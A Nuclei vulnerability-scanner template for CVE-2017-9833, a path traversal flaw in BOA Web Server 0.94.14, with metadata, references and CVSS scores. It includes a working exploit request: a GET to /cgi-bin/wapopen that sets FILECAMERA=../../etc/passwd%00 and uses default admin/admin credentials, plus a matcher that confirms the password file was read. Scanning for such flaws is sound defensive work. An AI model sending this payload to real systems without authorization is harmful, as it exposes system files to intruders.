nuclei-templates/http/cves/2017/CVE-2017-9833.yaml

46 lines
1.7 KiB
YAML

id: CVE-2017-9833
info:
name: BOA Web Server 0.94.14 - Arbitrary File Access
author: 0x_Akoko
severity: high
description: BOA Web Server 0.94.14 is susceptible to arbitrary file access. The server allows the injection of "../.." using the FILECAMERA variable sent by GET to read files with root privileges and without using access credentials.
impact: |
An attacker can gain unauthorized access to sensitive files on the server.
remediation: |
Upgrade to a patched version of BOA Web Server or apply the necessary security patches.
reference:
- https://www.exploit-db.com/exploits/42290
- https://nvd.nist.gov/vuln/detail/CVE-2017-9833
- https://pastebin.com/raw/rt7LJvyF
- https://www.exploit-db.com/exploits/42290/
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2017-9833
cwe-id: CWE-22
epss-score: 0.7354
epss-percentile: 0.98027
cpe: cpe:2.3:a:boa:boa:0.94.14.21:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: boa
product: boa
tags: cve,cve2017,boa,lfr,lfi,edb
http:
- method: GET
path:
- "{{BaseURL}}/cgi-bin/wapopen?B1=OK&NO=CAM_16&REFRESH_TIME=Auto_00&FILECAMERA=../../etc/passwd%00&REFRESH_HTML=auto.htm&ONLOAD_HTML=onload.htm&STREAMING_HTML=streaming.htm&NAME=admin&PWD=admin&PIC_SIZE=0"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200
# digest: 4a0a00473045022100c6c5530e8a0f7728fab4cc19d39ab606e55af708d754eddf2173d358e60e8520022056dcf2c7ef111692f117a4df198df23d7ffdb051dbf23191bd3d3c8f2e81eaed:922c64590222798bb761d5b6d8e72950